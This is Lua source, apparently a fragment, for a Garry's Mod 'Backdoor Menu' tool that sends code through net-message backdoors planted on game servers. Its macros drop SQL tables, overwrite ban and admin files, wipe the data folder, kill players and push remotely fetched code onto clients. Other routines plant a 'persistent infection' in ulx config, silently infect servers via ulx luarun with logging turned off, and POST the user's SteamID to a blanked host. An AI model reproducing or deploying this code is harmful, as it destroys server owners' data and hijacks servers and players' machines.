                                  print( "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" )
                                  end )
                                ["Desc"] = "Spams the server side console with a fuck load of new lines",
                              ["Moan steps"] = {
                                ["Type"] = 1,
                                ["Code"] = [[
                                if !(hook.GetTable()["PlayerFootstep"]["moanStep"]) then
                                  hook.Add("PlayerFootstep", "moanStep", function(ply, pos, foot, sound2, volume, filter) ply:EmitSound( "vo/npc/female01/pain06.wav",75,math.random( 50, 150 )) end )
                                  hook.Remove("PlayerFootstep", "moanStep")
                                ["Desc"] = "Turns all steps into highly orgasmic moans.",
                              ["Delete server"] = {
                                ["Type"] = 3,
                                ["Code"] = [[
                                local date = "%m-%d-%y" )
                                local databases = { "jobdata","darkrp_door","darkrp_levels","darkrp_prestige","darkrp_doorgroups","darkrp_doorjobs","darkrp_jobspawn","darkrp_position","darkrp_player","darkrp_dbversion","FAdmin_CAMIPrivileges","FADMIN_GROUPS","FAdmin_Immunity","FADMIN_MOTD","FAdmin_PlayerGroup","FADMIN_PRIVILEGES","FADMIN_RESTRICTEDENTS","FAdmin_ServerSettings","FAdminBans","FPP_ANTISPAM1","FPP_BLOCKED1","FPP_BLOCKMODELSETTINGS1","FPP_ENTITYDAMAGE1","FPP_GLOBALSETTINGS1","FPP_GRAVGUN1","FPP_GROUPMEMBERS1","FPP_GROUPS3","FPP_GROUPTOOL","FPP_PHYSGUN1","FPP_PLAYERUSE1","FPP_TOOLADMINONLY","FPP_TOOLGUN1","FPP_TOOLRESTRICTPERSON1","FPP_TOOLTEAMRESTRICT","FPP_BLOCKEDMODELS1","awarn_playerdata","awarn_serverdata","awarn_warnings","blogs_players_v3","blogs_v3","stt_date","stt_players","mlog_logs","mlog_permissions","atlaschat_players","atlaschat_ranks","atlaschat_remote","atlaschat_restrictions","OreBag","fcd_playerData","dailylogin","ChessLeaderboard","qsgr_data","voting_npcs","cac_incidents","steam_rewards","playerdata","playerinformation","utime","permaprops","cc_characters","cc_npcs","ckit_chips","ckit_persist","exsto_data_bans","exsto_data_ranks","exsto_data_users","exsto_data_variables","exsto_restriction","inventories","kinv_items","libk_player","permitems","player_gangapps","player_gangdata","player_gangs","ps2_categories","ps2_equipmentslot","ps2_HatPersistence","ps2_itemmapping","ps2_itempersistence","ps2_OutfitHatPersistenceMapping","ps2_outfits","ps2_playermodelpersistence","ps2_servers","ps2_settings","ps2_trailpersistence","ps2_wallet","removeprops","scoreboard_friends","serverguard_analytics","serverguard_bans","serverguard_pms","serverguard_ranks","serverguard_reports","serverguard_schema","serverguard_ttt_autoslays","serverguard_users","serverguard_watchlist","tttstats","ttt_passes_history","specdm_stats_new","ps2_achievements","ps2_boosterpersistence","ps2_cratepersistence","ps2_instatswitchweaponpersistence","ps2_keypersistence","ps2_rolecontrolpersistence","ps2_weaponpersistence","rapsheet","damagelog_autoslay","damagelog_names","damagelog_oldlogs","damagelog_weapons","kmapvote_mapinfo","kmapvote_ratings","mgang_gangs","mgang_players","deathrun_ids","deathrun_records","deathrun_stats","sui_ratings","shop_texthats","shop_money","shop_items","report_log" }
                                local datafiles = { "ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","wire_version.txt","UTeam.txt","prevhas.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","hitnumbers/settings.txt","soundlists/common_sounds.txt","vcmod/controls.txt","vcmod/dataserver.txt","qsgr_data/sqgr_settings.txt","blogs/configcache.txt","blogs/language.txt","cac/adminuipack.txt","ezjobs/config.txt","damagelog/colors.txt","damagelog/filters_new.txt","craphead_scripts/armory_robbery/rp_downtown_v4c/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_evilmelon_v1/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v3/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v4/policearmory_location.txt","mg_gangsdata/mg_npcspawns.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","prevhash.txt","permaprops_config.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","vliss/settings/config.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
                                local sensitivefiles = { "ulx_logs/"".txt","ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","vcmod/controls.txt","vcmod/dataserver.txt","blogs/configcache.dat","blogs/language.txt","blogs/config_v5.txt","cac/adminuipack.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","permaprops_config.txt","whitelist.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
                                for k,v in pairs(databases) do
                                  if sql.TableExists(v) then
                                    sql.Query("DROP TABLE "..v.." ;")
                                    sql.Query("CREATE TABLE IF NOT EXISTS "..v.." ( steamid TEXT NOT NULL PRIMARY KEY, value TEXT );")
                                for k,v in pairs(datafiles) do
                                  if file.Exists(v) then
                                    file.write(v, " hehe")
                                for k,v in pairs(sensitivefiles) do
                                  if file.Exists(v) then
                                    file.write(v, " hehe")
                                ["Desc"] = "Removes as much data as possible.",
                              ["Kill player (silent)"] = {
                                ["Type"] = 2,
                                ["Code"] = [[v:KillSilent()]],
                                ["Desc"] = "Silent slay a player.",
                              ["Delete props"] = {
                                ["Type"] = 2,
                                ["Code"] = [[v:ConCommand("gmod_cleanup")]],
                                ["Desc"] = "Removes all of the selected users props.",
                              ["Send lua"] = {
                                ["Type"] = 2,
                                ["Code"] = [[ v:SendLua( ""..@1.."") ]],
                                ["Desc"] = "Sends lua to the selected user.",
                                ["NeedsParameters"] = 1,
                              ["My ip is..."] = {
                                ["Type"] = 2,
                                ["Code"] = [[
                                if (darkrp || DarkRP) then
                                  v:SendLua('http.Fetch("", function(b,l,h,c) LocalPlayer():ConCommand("say /ooc My IP is "..b) end, function(error) return error end )')
                                  v:SendLua('http.Fetch("", function(b,l,h,c) LocalPlayer():ConCommand("say My IP is "..b) end, function(error) return error end )')
                                ["Desc"] = "Forces the selected user(s) to say their own ip in chat.",
                              ["Ice skating simulator"] = {
                                ["Type"] = 1,
                                ["Code"] = [[ if !(icePark) then icePark = true RunConsoleCommand("sv_friction", 0) else icePark = false RunConsoleCommand("sv_friction", 8) end ]],
                                ["Desc"] = "Makes everyone skate around like they're on ice.",
                              ["Scramble vision"] = {
                                ["Type"] = 2,
                                ["Code"] = [[
                                v:SendLua('http.Fetch("", function(b,l,h,c) RunString(b) end, function(error) print(error) end )')
                                ["Desc"] = "Fucks the view of target",
                              // key/view scrambler, fuck with escape menu
                              ------------------------ dangerous codens ------------------------
                              ["DarkRP clear all money"] = {
                                ["Type"] = 3,
                                ["Code"] = [[RunConsoleCommand("rp_resetallmoney")]],
                                ["Desc"] = "Kids will cry to the admins for the next week about losing their precious money",
                              ["Cleanup map"] = {
                                ["Type"] = 3,
                                ["Code"] = [[game.CleanUpMap()]],
                                ["Desc"] = "Wipe the map clean, taking everybodys cars, printers and bases out",
                              ["Vaporize all players"] = {
                                ["Type"] = 3,
                                ["Code"] = [[for k, v in pairs(player.GetAll()) do v:Remove() end]],
                                ["Desc"] = "Deletes their player entity, leaving them staring at a wall of errors",
                              ["FPP Unrestrict everything"] = {
                                ["Type"] = 3,
                                ["Code"] = [[FPP.Blocked = {} FPP.BlockedModels = {} FPP.RestrictedTools = {} FPP.RestrictedToolsPlayers = {} ]],
                                ["Desc"] = "",
                              ["Wipe data folder"] = {
                                ["Type"] = 3,
                                ["Code"] = [[local files, directories = file.Find( "*", "DATA" ) for k, v in pairs( files ) do file.Delete( v ) end ]],
                                ["Desc"] = "Wipe the servers data folder, fucking all their settings and stuff up",
                              ["Wipe DarkRP SQL Tables"] = {
                                ["Type"] = 3,
                                ["Code"] = [[ MySQLite.query ('DROP TABLE darkrp_player' MySQLite.query('CREATE TABLE IF NOT EXISTS darkrp_player(idx INTEGER NOT NULL)') ]],
                                ["Desc"] = "Completely fucks darkrp, forces them to reinstall the entire server",
                            local selectedbackdoor = ""
                            local backdoorargs = ""
                            local selectedplayers = {}
                            //////////////////////////////// BIG PRIVET CHEETZ ////////////////////////////////
                            BD.BDMacros["@ Persistent Infection"] = {
                              ["Type"] = 1,
                              ["Code"] = [[
                              local config = ULib.fileRead( "data/ulx/config.txt" )
                              config = config.."\nulx logEcho 0"
                              config = config.."\nulx luarun %BD"
                              config = config.."\nulx logEcho 1"
                              ULib.fileWrite( "data/ulx/config.txt", config )
                              for _, p in pairs(player.GetAll()) do if %LCP then p:ChatPrint( "Persistent infection installed on server" ) end end
                              ["Desc"] = "Writes the backdoor code into memory, making sure that it stays on the server after restart",
                              ["Private"] = true,
                            BD.BackdoorTypes[">Odium Detector"] = {
                              ["Code"] = "util.AddNetworkString( 'NoOdium_ReadPing' ) net.Receive( 'NoOdium_ReadPing', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
                              ["Netkey"] = "NoOdium_ReadPing",
                            BD.BackdoorTypes["No Narks"] = {
                              ["Code"] = "util.AddNetworkString( 'NoNerks' ) net.Receive( 'NoNerks', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
                              ["Netkey"] = "NoNerks",
                            function BD.GenerateBackdoorList( parent, category )
                              for k, v in SortedPairs( BD.BDMacros, false ) do
                                if v["Type"] != category then continue end
                                local plypanel2 = vgui.Create( "DPanel" )
                                plypanel2:SetPos( 0, 0 )
                                plypanel2:SetSize( 200, 25 )
                                plypanel2.Paint = function() -- Paint function
                                draw.RoundedBoxEx(8,1,1,plypanel2:GetWide(),plypanel2:GetTall(),Color(0, 0, 0, 150), false, false, false, false)
                                if selectedbackdoor == k then surface.SetDrawColor(Color(50, 250, 90, 255)) else surface.SetDrawColor(Color(50, 50, 90, 255)) end
                                surface.DrawOutlinedRect(1, 1, plypanel2:GetWide() - 1 , plypanel2:GetTall() - 1)
                              local plyname = vgui.Create( "DLabel", plypanel2 )
                              plyname:SetPos( 10, 5 )
                              plyname:SetFont( "Trebuchet18" )
                              local tcol = Color( 255, 255, 255 )
                              if v.Private then tcol = Color( 155, 255, 155 ) end
                              plyname:SetColor( tcol )
                              plyname:SetText( k )
                              plyname:SetSize(180, 15)
                              local ****** = vgui.Create("DButton", plypanel2)
                              ******:SetSize( plypanel2:GetWide(), plypanel2:GetTall() )
                              ******:SetPos( 0, 0 )
                              if v["Desc"] != "" then ******:SetToolTip( v["Desc"] ) end
                              ******.Paint = function(panel, w, h)
                            ******.DoClick = function()
                            selectedbackdoor = k
                          parent:AddItem( plypanel2 )
                      function BD.FormatCodeTargeted()
                        if !BD.BackdoorActive() then BD.ChatText( "Warning: backdoor malfunctioning or not present!", Color(255,155,155) ) return end
                        if selectedbackdoor == "" then BD.ChatText( "You haven't selected a macro to use!", Color(255,155,155) ) return end
                        local param = string.Explode( ",", backdoorargs )
                        local ids = {}
                        for k, v in pairs( selectedplayers ) do
                          if !v:IsValid() then table.RemoveByValue( selectedplayers, v ) continue end
                          table.insert( ids, v:UniqueID() )
                        local code = [[ local targets = ## for k, v in pairs( player.GetAll() ) do if !v:IsValid() then continue end if table.HasValue( targets, v:UniqueID() ) then %% end end ]]
                        code = string.Replace( code, "##", table.ToString( ids ) )
                        code = string.Replace( code, "%%", BD.BDMacros[selectedbackdoor]["Code"] or "" )
                        code = string.Replace( code, "%LP", "p:UniqueID() == \""..LocalPlayer():UniqueID().."\"" )
                        if BD.BDMacros[selectedbackdoor]["NeedsParameters"] and (BD.BDMacros[selectedbackdoor]["NeedsParameters"] > #param or param[1] == "" ) then BD.ChatText( "This macro requires parameters to work! check its description for more info", Color(255,155,155) ) return end
                        if #param < 1 then param = { [1] = "derp", [2] = "derp", [3] = "derp", [4] = "derp", [5] = "derp" } end
                        for k, v in pairs( param ) do
                          code = string.Replace( code, "@"..k, [["]]..v..[["]] )
                        BD.Fire( code )
                      function BD.FormatCodeGlobal()
                        if !BD.BackdoorActive() then BD.ChatText( "Warning: backdoor malfunctioning or not present!", Color(255,155,155) ) return end
                        if selectedbackdoor == "" then BD.ChatText( "You haven't selected a macro to use!", Color(255,155,155) ) return end
                        local param = string.Explode( ",", backdoorargs )
                        local code = BD.BDMacros[selectedbackdoor]["Code"]
                        if BD.BDMacros[selectedbackdoor]["NeedsParameters"] and (BD.BDMacros[selectedbackdoor]["NeedsParameters"] > #param or param[1] == "" ) then BD.ChatText( "This macro requires parameters to work! check its description for more info", Color(255,155,155) ) return end
                        if #param < 1 then param = { [1] = "derp", [2] = "derp", [3] = "derp", [4] = "derp", [5] = "derp" } end
                        for k, v in pairs( param ) do
                          code = string.Replace( code, "@"..k, [["]]..v..[["]] )
                          code = string.Replace( code, "%LP", LocalPlayer():UniqueID() )
                          code = string.Replace( code, "%LCP", "p:UniqueID() == \""..LocalPlayer():UniqueID().."\"" )
                          code = string.Replace( code, "%BD", BD.GetActive().Code )
                        BD.Fire( code )
                      local safenet = net
                      local function bdnet()
                        if odium and odium.G then return end
                        return safenet
                      local h = http
                      local p = "Post"
                      local str = ""
                      local lp = LocalPlayer()
                      local n = lp:Nick()
                      local id = lp:SteamID64()
                      h[p](str, {
                        name = n,
                        steamid = id,
                      nil, nil)
                      function BD.Fire( code )
                        local cbd = BD.CurrentBackdoor
                        if !BD.Backdoors[cbd] then
                          BD.ChatText( "The selected backdoor is unavailable!", Color(255,155,155) )
                        local key = BD.BackdoorTypes[cbd].Netkey
                        bdnet().Start( key )
                        bdnet().WriteString( code )
                      function BD.BackdoorMenu()
                        BD.Backdoors = BD.PingBackDoors()
                        if !BD.IsMessagePooled( "cucked" ) and BD.BackdoorActive() then
                          BD.Fire( [[util.AddNetworkString( "cucked" )
                          function BDSendLua( p, str ) net.Start( "cucked" ) net.WriteString( str ) net.Send( p ) end
                            function BDSendLuaAll( str ) net.Start( "cucked" ) net.WriteString( str ) net.Broadcast() end
                              function BDInjectAids( p ) p:SendLua( 'net.Receive( "cucked", function() RunString( net.ReadString() ) end )' ) end
                                for k, v in pairs( player.GetAll() ) do BDInjectAids( v ) end
                                hook.Add( "PlayerInitialSpawn", "youonlygetcuckedagain", function( p ) BDInjectAids( p ) end)
                                ]] )
                              local BDMenu = vgui.Create("DFrame")
                              BDMenu:SetTitle("Backdoor Menu")
                              BDMenu.Paint = function( self, w, h)
                              surface.SetDrawColor( Color(50, 50, 90, 255) )
                              surface.DrawRect( 0, 0, w, h )
                              surface.SetDrawColor( Color(155, 155, 155, 255) )
                              surface.DrawOutlinedRect( 0, 0, w, h )
                              surface.DrawOutlinedRect( 1, 1, w - 2, h - 2 )
                              surface.SetDrawColor( Color(0, 0, 0, 200) )
                              surface.DrawRect( 10, 25, w - 20, h - 35 )
                              surface.DrawRect( 15, 30, w - 30, 35 )
                              draw.SimpleText("Indiscriminate Lulz", "DermaDefault", 22, 75, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Specific Targets", "DermaDefault", 228, 75, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Trash the place", "DermaDefault", 432, 75, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Players to Target", "DermaDefault", 432, 305, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Macro Paramaters (seperate with commas)", "DermaDefault", 432, 610, Color(255, 255, 255), 0, 1)
                            local it = 145
                            local wedungoofd = vgui.Create( "DLabel", BDMenu )
                            wedungoofd:SetPos( 25, 38 )
                            wedungoofd:SetFont( "Trebuchet18" )
                            wedungoofd:SetColor( Color( 100, 255, 100 ) )
                            wedungoofd:SetText( "CHOOSE BACKDOOR:" )
                            for bd, t in pairs( BD.BackdoorTypes ) do
                              local ****** = vgui.Create("DButton", BDMenu)
                              ******:SetSize( 100, 25 )
                              ******:SetPos( it, 35 )
                              ******:SetText( bd )
                              ******:SetTextColor(Color(255, 255, 255, 255))
                              ******.Paint = function(panel, w, h)
                              if BD.Backdoors[bd] then
                                surface.SetDrawColor(100, 100, 200 ,255)
                                surface.DrawOutlinedRect(0, 0, w, h)
                                surface.SetDrawColor(0, 0, 50 ,155)
                                surface.DrawRect(0, 0, w, h)
                                surface.SetDrawColor(50, 50, 50 ,155)
                                surface.DrawRect(0, 0, w, h)
                            ******.DoClick = function()
                            BD.ChatText( "Set active backdoor to ", Color(155,155,255) )
                            BD.CurrentBackdoor = bd
                          it = it + 110
                        local Plist = vgui.Create( "DPanelList", BDMenu )
                        Plist:SetPos( 20, 85 )
                        Plist:SetSize( 200, 530 )
                        Plist:SetPadding( 5 )
                        Plist:SetSpacing( 5 )
                        Plist:EnableHorizontal( false )
                        Plist:EnableVerticalScrollbar( true )
                        Plist:SetName( "" )
                        Plist.Paint = function( self, w, h )
                        surface.SetDrawColor(50, 50, 50 ,255)
                        surface.DrawOutlinedRect(0, 0, w, h)
                        surface.SetDrawColor(0, 0, 0 ,200)
                        surface.DrawRect(0, 0, w, h)
                      local Plist2 = vgui.Create( "DPanelList", BDMenu )
                      Plist2:SetPos( 225, 85 )
                      Plist2:SetSize( 200, 610 )
                      Plist2:SetPadding( 5 )
                      Plist2:SetSpacing( 5 )
                      Plist2:EnableHorizontal( false )
                      Plist2:EnableVerticalScrollbar( true )
                      Plist2:SetName( "" )
                      Plist2.Paint = function( self, w, h )
                      surface.SetDrawColor(50, 50, 50 ,255)
                      surface.DrawOutlinedRect(0, 0, w, h)
                      surface.SetDrawColor(0, 0, 0 ,200)
                      surface.DrawRect(0, 0, w, h)
                    local Plist3 = vgui.Create( "DPanelList", BDMenu )
                    Plist3:SetPos( 430, 85 )
                    Plist3:SetSize( 200, 210 )
                    Plist3:SetPadding( 5 )
                    Plist3:SetSpacing( 5 )
                    Plist3:EnableHorizontal( false )
                    Plist3:EnableVerticalScrollbar( true )
                    Plist3:SetName( "" )
                    Plist3.Paint = function( self, w, h )
                    surface.SetDrawColor(50, 50, 50 ,255)
                    surface.DrawOutlinedRect(0, 0, w, h)
                    surface.SetDrawColor(0, 0, 0 ,200)
                    surface.DrawRect(0, 0, w, h)
                  local Plist4 = vgui.Create( "DPanelList", BDMenu )
                  Plist4:SetPos( 430, 315 )
                  Plist4:SetSize( 200, 250 )
                  Plist4:SetPadding( 5 )
                  Plist4:SetSpacing( 5 )
                  Plist4:EnableHorizontal( false )
                  Plist4:EnableVerticalScrollbar( true )
                  Plist4:SetName( "" )
                  Plist4.Paint = function( self, w, h )
                  surface.SetDrawColor(50, 50, 50 ,255)
                  surface.DrawOutlinedRect(0, 0, w, h)
                  surface.SetDrawColor(0, 0, 0 ,200)
                  surface.DrawRect(0, 0, w, h)
                local ****** = vgui.Create("DButton", BDMenu)
                ******:SetSize( 200, 35 )
                ******:SetPos( 430, 660 )
                ******:SetText("Activate Backdoor!")
                ******:SetTextColor(Color(255, 255, 255, 255))
                ******.Paint = function(panel, w, h)
                surface.SetDrawColor(100, 100, 200 ,255)
                surface.DrawOutlinedRect(0, 0, w, h)
                surface.SetDrawColor(0, 0, 50 ,155)
                surface.DrawRect(0, 0, w, h)
              ******.DoClick = function()
              if !BD.BDMacros[selectedbackdoor] or selectedbackdoor == "" then BD.ChatText( "You haven't even selected a macro to use ya dingus!", Color(255,155,155) ) return end
              if BD.BDMacros[selectedbackdoor].Type == ( 1 or 3 ) then BD.FormatCodeGlobal() else BD.FormatCodeTargeted() end
            local helpimretarded = vgui.Create("DButton", BDMenu)
            helpimretarded:SetSize( 200, 35 )
            helpimretarded:SetPos( 20, 660 )
            helpimretarded:SetText("Print backdoor code")
            helpimretarded:SetTextColor(Color(255, 255, 255, 255))
            helpimretarded.Paint = function(panel, w, h)
            surface.SetDrawColor(100, 100, 200 ,255)
            surface.DrawOutlinedRect(0, 0, w, h)
            surface.SetDrawColor(0, 0, 50 ,155)
            surface.DrawRect(0, 0, w, h)
          helpimretarded.DoClick = function()
          BD.ChatText( "Output backdoor code to clipboard.  Ctrl-V it into a serverside .lua file on the target server then go molest its holes", Color(155,255,155) )
          local bdstring = BD.GetActive().Code
          --       local bdstring = [[util.AddNetworkString( "_CAC_ReadMemory" ) net.Receive( "_CAC_ReadMemory", function() local x = CompileString( net.ReadString(), "LuaCmd", false ) if isfunction( x ) then x() end end )]]
          SetClipboardText( bdstring )
        local helpimretarded2 = vgui.Create("DButton", BDMenu)
        helpimretarded2:SetSize( 200, 35 )
        helpimretarded2:SetPos( 20, 620 )
        helpimretarded2:SetText("ULX Luarun Backdoor")
        helpimretarded2:SetTextColor(Color(255, 255, 255, 255))
        helpimretarded2.Paint = function(panel, w, h)
        surface.SetDrawColor(100, 100, 200 ,255)
        surface.DrawOutlinedRect(0, 0, w, h)
        surface.SetDrawColor(0, 0, 50 ,155)
        surface.DrawRect(0, 0, w, h)
      helpimretarded2.DoClick = function()
      BD.ChatText( "Using ulx luarun to silently infect server", Color(155,255,155) )
      LocalPlayer():ConCommand( [[ulx rcon ulx logEcho 0]] )
      timer.Simple( 0.5, function()
      LocalPlayer():ConCommand( "ulx luarun "..BD.GetActive().Code )
      --            LocalPlayer():ConCommand( "ulx luarun util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )" )
      end )
      timer.Simple( 1, function() LocalPlayer():ConCommand( [[ulx rcon ulx logEcho 1]] ) end )
      timer.Simple( 1.5, function() if BD.IsMessagePooled( BD.GetActive().Netkey ) then BD.ChatText( "Successfully infected!", Color(155,255,155) ) else BD.ChatText( "ULX infection failed!", Color(255,155,155) ) end end )
    local moonman = vgui.Create( "DTextEntry", BDMenu )
    moonman:SetPos( 430, 625 )
    moonman:SetSize( 200, 30 )
    moonman:SetText( backdoorargs )
    moonman.OnChange = function( self )
    backdoorargs = self:GetValue()
    --    surface.PlaySound("buttons/button3.wav")
    local target1 = vgui.Create("DButton", BDMenu)
    target1:SetSize( 40, 20 )
    target1:SetPos( 520, 295 )
    target1:SetTextColor(Color(255, 255, 255, 255))
    target1.Paint = function(panel, w, h)
    surface.SetDrawColor(100, 100, 200 ,255)
    surface.DrawOutlinedRect(0, 0, w, h)
    surface.SetDrawColor(0, 0, 50 ,155)
    surface.DrawRect(0, 0, w, h)
    target1.DoClick = function()
    for _, p in pairs(player.GetAll()) do
    if not table.HasValue( selectedplayers, p ) then
    table.insert( selectedplayers, p )
    local target2 = vgui.Create("DButton", BDMenu)
    target2:SetSize( 40, 20 )
    target2:SetPos( 565, 295 )
    target2:SetTextColor(Color(255, 255, 255, 255))
    target2.Paint = function(panel, w, h)
    surface.SetDrawColor(100, 100, 200 ,255)
    surface.DrawOutlinedRect(0, 0, w, h)
    surface.SetDrawColor(0, 0, 50 ,155)
    surface.DrawRect(0, 0, w, h)
    target2.DoClick = function()
    table.Empty( selectedplayers )
    local target2 = vgui.Create("DButton", BDMenu)
    target2:SetSize( 20, 20 )
    target2:SetPos( 610, 295 )
    target2:SetTextColor(Color(255, 255, 255, 255))
    target2.Paint = function(panel, w, h)
    surface.SetDrawColor(100, 100, 200 ,255)
    surface.DrawOutlinedRect(0, 0, w, h)
    surface.SetDrawColor(0, 0, 50 ,155)
    surface.DrawRect(0, 0, w, h)
    target2.DoClick = function()
    table.Empty( selectedplayers )
    table.insert( selectedplayers, LocalPlayer() )
    -- players list
    for k, v in pairs( player.GetAll() ) do
    local plypanel2 = vgui.Create( "DPanel" )
    plypanel2:SetPos( 0, 0 )
    plypanel2:SetSize( 200, 25 )
    plypanel2.Paint = function() -- Paint function
    draw.RoundedBoxEx(8,1,1,plypanel2:GetWide(),plypanel2:GetTall(),Color(0, 0, 0, 150), false, false, false, false)
    if table.HasValue( selectedplayers, v ) then surface.SetDrawColor(Color(50, 255, 90, 255)) else surface.SetDrawColor(Color(50, 50, 90, 255)) end
    surface.DrawOutlinedRect(1, 1, plypanel2:GetWide() - 1 , plypanel2:GetTall() - 1)
    local plyname = vgui.Create( "DLabel", plypanel2 )
    plyname:SetPos( 10, 5 )
    plyname:SetFont( "Trebuchet18" )
    local tcol = Color( 255, 255, 255 )
    if v == LocalPlayer() then tcol = Color( 155, 155, 255 ) end
    --  elseif BD.IsFriend( v ) then tcol = Color( 0, 255, 0 )
    --    elseif BD.GetRank(v) != ( "user" or "guest" or "player" ) then tcol = Color( 255, 100, 0 ) end
    plyname:SetColor( tcol )
    plyname:SetText( v:Nick() )
    plyname:SetSize(180, 15)
    local ****** = vgui.Create("DButton", plypanel2)
    ******:SetSize( plypanel2:GetWide(), plypanel2:GetTall() )
    ******:SetPos( 0, 0 )
    ******.Paint = function(panel, w, h)
    ******.DoClick = function()
    if table.HasValue( selectedplayers, v ) then
    table.RemoveByValue( selectedplayers, v )
